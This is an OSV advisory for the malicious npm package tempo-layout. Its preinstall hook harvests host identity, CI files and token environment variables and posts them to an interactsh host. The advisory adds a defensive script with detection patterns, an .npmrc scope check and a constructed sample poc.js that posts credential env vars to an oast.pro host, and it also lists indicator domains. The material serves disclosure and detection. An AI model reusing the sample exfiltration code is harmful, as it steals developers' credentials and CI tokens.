MAL-2026-4686

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/tempo-layout/MAL-2026-4686.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4686
Published
2026-05-25T13:57:52Z
Modified
2026-05-26T06:02:58.956225526Z
Summary
Malicious code in tempo-layout (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (795bf7080d27cef141114dd46b5734c136f762933a43f2d1308e82547c5f99a6)

tempo-layout@99.0.2 ships a preinstall hook (poc.js) that runs unconditionally on npm install. It collects host identity (os.hostname, whoami, id), network configuration (ipconfig / ip a / resolv.conf), the git remote, the parent package.json, CI pipeline files (.gitlab-ci.yml, .github/workflows, Jenkinsfile, azure-pipelines.yml), and a filtered sweep of environment variables whose names match the TOKEN/AWS/AZURE/NPM/GITHUB/GITLAB/JENKINS/WALMART/CI_/BUILD prefixes. The collected JSON is POSTed over HTTPS to a hardcoded interactsh subdomain (d8a5d9pon5bugoc35cngp9hcregcqyezu.oast.me). The package also self-identifies as a dependency-confusion proof-of-concept targeting an internal namespace (@livingdesign/react), and because it is published to the public npm registry, any organization whose resolver falls through to public npm receives the payload. Whatever bug-bounty framing the metadata carries, the published artifact harvests installer credentials and CI tokens and ships them off-host at install time: this is an installer-side supply-chain attack.
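The two controls a practitioner wants after reading the details above are a static triage of an unpacked tarball for install-time hooks carrying the patterns described (recon commands, an env-var sweep, an out-of-band callback) and a check that the internal scope the package impersonates is pinned to a private registry in .npmrc so the resolver cannot fall through to public npm. The following is an added example written for this page, not code from the OSV record, Amazon Inspector or the package itself. The sample package.json, poc.js text and .npmrc are constructed to mirror the advisory's description (the real poc.js and its exact callback host are not reproduced); the helper names auditPackage and unprotectedScopes, the @acme scope and the npm.internal.example registry are assumptions.

```javascript
// Added example: static triage of an unpacked npm package plus an .npmrc
// scope check. Not the advisory's or the package's code; samples are constructed.

// Lifecycle scripts that run during `npm install` without user interaction.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Indicator patterns drawn from the behaviour described in the advisory.
// The oast.* / interact.sh match covers interactsh out-of-band domains (assumption:
// extend this list with the callback services your environment sees).
const INDICATORS = [
  { name: 'recon-command', re: /\b(whoami|hostname|ipconfig|ifconfig|ip\s+a\b|resolv\.conf|git\s+remote)\b/ },
  { name: 'env-sweep',     re: /process\.env\b[\s\S]{0,200}(TOKEN|AWS|AZURE|NPM|GITHUB|GITLAB|JENKINS|CI_|BUILD)/ },
  { name: 'ci-file-read',  re: /(\.gitlab-ci\.yml|\.github\/workflows|Jenkinsfile|azure-pipelines\.yml)/ },
  { name: 'oob-callback',  re: /\.oast\.[a-z]+\b|\binteract\.sh\b/ },
  { name: 'http-exfil',    re: /(https?\.request|fetch)\s*\([\s\S]{0,300}method\s*:\s*['"]POST['"]/ },
];

// pkg: parsed package.json; files: { relativePath: fileContents } from the tarball.
// Returns one finding per install hook and one per indicator hit in the hooked script.
function auditPackage(pkg, files) {
  const findings = [];
  const scripts = pkg.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    if (!scripts[hook]) continue;
    findings.push({ type: 'lifecycle-hook', hook, command: scripts[hook] });
    // Resolve "node poc.js"-style commands to a file shipped in the package.
    const m = scripts[hook].match(/\bnode\s+(\.\/)?([\w./-]+\.c?m?js)\b/);
    const src = m && files[m[2]];
    if (!src) continue;
    for (const ind of INDICATORS) {
      if (ind.re.test(src)) findings.push({ type: ind.name, hook, file: m[2] });
    }
  }
  return findings;
}

// Returns the internal scopes that .npmrc does NOT pin to the private registry,
// i.e. the scopes a public look-alike package could still be resolved for.
function unprotectedScopes(npmrcText, internalScopes, privateRegistryPrefix) {
  const pinned = new Map();
  for (const raw of npmrcText.split(/\r?\n/)) {
    const line = raw.trim();
    if (!line || line.startsWith('#') || line.startsWith(';')) continue;
    const m = line.match(/^(@[^:=\s]+):registry\s*=\s*(\S+)/);
    if (m) pinned.set(m[1], m[2]);
  }
  return internalScopes.filter(s => !(pinned.get(s) || '').startsWith(privateRegistryPrefix));
}

// Constructed sample inputs (not the real artifact).
const SAMPLE_PKG = { name: 'tempo-layout', version: '99.0.2', scripts: { preinstall: 'node poc.js' } };
const SAMPLE_FILES = {
  'poc.js': [
    "const os = require('os'), cp = require('child_process'), https = require('https');",
    "const info = { host: os.hostname(), user: cp.execSync('whoami').toString() };",
    "info.env = Object.fromEntries(Object.entries(process.env)",
    "  .filter(([k]) => /^(TOKEN|AWS|AZURE|NPM|GITHUB|GITLAB|JENKINS|CI_|BUILD)/.test(k)));",
    "const req = https.request({ host: 'example.oast.pro', method: 'POST', path: '/' });",
    "req.end(JSON.stringify(info));",
  ].join('\n'),
};
const SAMPLE_NPMRC =
  '@livingdesign:registry=https://npm.internal.example/\n' +
  '@other:registry=https://registry.npmjs.org/\n';

console.log(auditPackage(SAMPLE_PKG, SAMPLE_FILES));
console.log(unprotectedScopes(SAMPLE_NPMRC, ['@livingdesign', '@acme'], 'https://npm.internal.example/'));
```

Run the audit against the extracted contents of a tarball before it reaches a build agent; any lifecycle-hook finding is worth a manual look even without indicator hits, since `ignore-scripts=true` in .npmrc is the only setting that prevents the hook from executing at all. The scope check is a one-line guard for the dependency-confusion half of the advisory: every internal scope should resolve only to the private registry, with no fallthrough to registry.npmjs.org.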

Database specific
{
    "malicious-packages-origins": [
        {
            "sha256": "44d04dff489ed1e87d2258e629b6f6b7c6b4090c2f4540e1aa3dab87d2999690",
            "id": "IN-MAL-2026-004670",
            "source": "amazon-inspector",
            "modified_time": "2026-05-25T14:04:54Z",
            "versions": [
                "99.0.1"
            ],
            "import_time": "2026-05-26T05:53:03.421717477Z"
        },
        {
            "sha256": "c3f1e43c7ff8f95617d841a068f59847f92e6487ac024a31cc9e4a765799d7de",
            "id": "IN-MAL-2026-004658",
            "source": "amazon-inspector",
            "modified_time": "2026-05-25T13:57:52Z",
            "versions": [
                "99.0.0"
            ],
            "import_time": "2026-05-26T05:53:02.146203626Z"
        },
        {
            "sha256": "795bf7080d27cef141114dd46b5734c136f762933a43f2d1308e82547c5f99a6",
            "import_time": "2026-05-26T05:53:04.109100916Z",
            "source": "amazon-inspector",
            "modified_time": "2026-05-25T14:09:57Z",
            "versions": [
                "99.0.2"
            ],
            "id": "IN-MAL-2026-004676"
        },
        {
            "sha256": "ada1f3c19a6252264962a2efe3bc53fba1340c3bce76257ef9054ac5e1963a5d",
            "id": "IN-MAL-2026-004657",
            "source": "amazon-inspector",
            "modified_time": "2026-05-25T13:57:52Z",
            "versions": [
                "99.0.0"
            ],
            "import_time": "2026-05-26T05:53:02.037284755Z"
        },
        {
            "sha256": "b17d078c4f137d26fb548d86936b2da4ae3b3ab1328d14fed33975ab5a140d3f",
            "id": "IN-MAL-2026-004671",
            "source": "amazon-inspector",
            "modified_time": "2026-05-25T14:04:54Z",
            "versions": [
                "99.0.1"
            ],
            "import_time": "2026-05-26T05:53:03.545519374Z"
        },
        {
            "sha256": "b200465f630596d74ae24899022d0a24082514304b201987ca6e4cbecaf317bf",
            "id": "IN-MAL-2026-004677",
            "source": "amazon-inspector",
            "modified_time": "2026-05-25T14:09:58Z",
            "versions": [
                "99.0.2"
            ],
            "import_time": "2026-05-26T05:53:04.223105075Z"
        }
    ]
}
References
Credits

Affected packages

npm / tempo-layout

Package: tempo-layout (npm)
Affected ranges: 99.*
Affected versions: 99.0.0, 99.0.1, 99.0.2

Database specific

source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/tempo-layout/MAL-2026-4686.json"
cwes
[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    },
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    },
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]
indicators
{
    "domains": [
        "d8a56vpon5budaeafq00tsyj88aqd5m7p.oast.pro",
        "tempo-layout-7363616e2d38663633613365656333.d8a56vpon5budaeafq00tsyj88aqd5m7p.oast.pro"
    ],
    "evidence_files": [
        {
            "sha256": "ecb577737482bd21bf2693c33bb07cb998eb03401ed5f8d8b6a295f19da7b9b4",
            "tlsh": "de3165d615f9647036a7f6c0b0d6ad514367e323b54af8e8258c094123df9f141f92e5",
            "path": "poc.js"
        },
        {
            "sha256": "6b4cf996dc6565995b4b6f0f7f24a5ae446b8a301c9a8b65ca70f158e6c0cb17",
            "tlsh": "4ae07d78141020235ad8c3fa05b658479128cd0b11186c1d0757344c43aeb63017eb5e",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "filename": "tempo-layout-99.0.1.tgz",
            "hashes": {
                "sha1": "f52f6a14d7f0d04e397ca2dcc388d80660455c6e",
                "sha512_sri": "sha512-kxnGG221LCurEj7DMPDdCGOkQhtIsnUMYshGi352sD7gaHjxFc6HoBAlWHWfFIexSHntJy3SEXEAUbk2KHEyWg=="
            }
        }
    ]
}